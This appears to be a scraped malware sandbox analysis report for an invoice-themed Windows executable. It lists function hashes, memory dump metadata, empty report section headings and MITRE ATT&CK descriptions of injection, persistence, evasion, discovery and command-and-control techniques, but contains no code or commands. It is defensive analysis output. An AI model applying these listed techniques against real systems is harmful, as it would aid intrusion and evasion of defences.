Opcode Fuzzy Hash: f6aa0f651077386a53edfe390dcd3e8234b1f0c4a6ae9c3a6f519629d02b9f32
Instruction Fuzzy Hash: 081123B68002498FDB10CF9AD444B9EFBF5EB89224F04851ED829B7600C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D9698, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 013D96FD

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6cf9f5d1f53fe43a65f24aeeb9d8f17c7542d811b606cee9021ac25c123beada
Instruction ID: 9813cbb232e7f5b8417b06960ace22ccfc2c3ab67f152944534f409b884230f7
Opcode Fuzzy Hash: 6cf9f5d1f53fe43a65f24aeeb9d8f17c7542d811b606cee9021ac25c123beada
Instruction Fuzzy Hash: 47118CB58003988FDB20DF99D4487EEBFF8EB09328F14805DD595B7245C7799648CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0135D4DC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.928383794.000000000135D000.00000040.00000001.sdmp, Offset: 0135D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed1e69b5720dcc602d84bae4d176ee2f12db641585a9a5a6ab4ded44ca1b231
Instruction ID: 4233389df251bad0acb3a13c72053cc5b8732eb7929a9909d630ce3d5df4305d
Opcode Fuzzy Hash: 5ed1e69b5720dcc602d84bae4d176ee2f12db641585a9a5a6ab4ded44ca1b231
Instruction Fuzzy Hash: 7D2125B1504204DFDB45DF54D8C0F26BFA6FB8872CF248969ED054B206C336D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0136D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.928636904.000000000136D000.00000040.00000001.sdmp, Offset: 0136D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545b105cab62eadbc770c31717ed44df1a1b5d9711d13a8371b418fd477a3db2
Instruction ID: 65a207771fe3c2a130abda2ae2693449d6b9f4212ea14091a3551477bcfd0047
Opcode Fuzzy Hash: 545b105cab62eadbc770c31717ed44df1a1b5d9711d13a8371b418fd477a3db2
Instruction Fuzzy Hash: FD2167B1604204DFCB10CF54D8C0B26BBA9FB88358F24C56DE8894B24AC377D807CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0135D4D7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.928383794.000000000135D000.00000040.00000001.sdmp, Offset: 0135D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction ID: 10091696eb3f18e81f3f7a0205efc7fe92a83fc9e105ec63d25bbb0e4ef2f71e
Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction Fuzzy Hash: 6E11B176504284CFDB12CF54D5C4B16BF72FB88728F2886A9DC050B616C336D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0136D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.928636904.000000000136D000.00000040.00000001.sdmp, Offset: 0136D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
Instruction ID: 93b56d5e57d68921da4d14fded77576f21fdcf932aef4b17955c3b5cd922f662
Opcode Fuzzy Hash: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
Instruction Fuzzy Hash: 3011D075604280CFCB12CF14D5C4B15FF71FB89318F28C6AAD8494B65AC33AD44ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre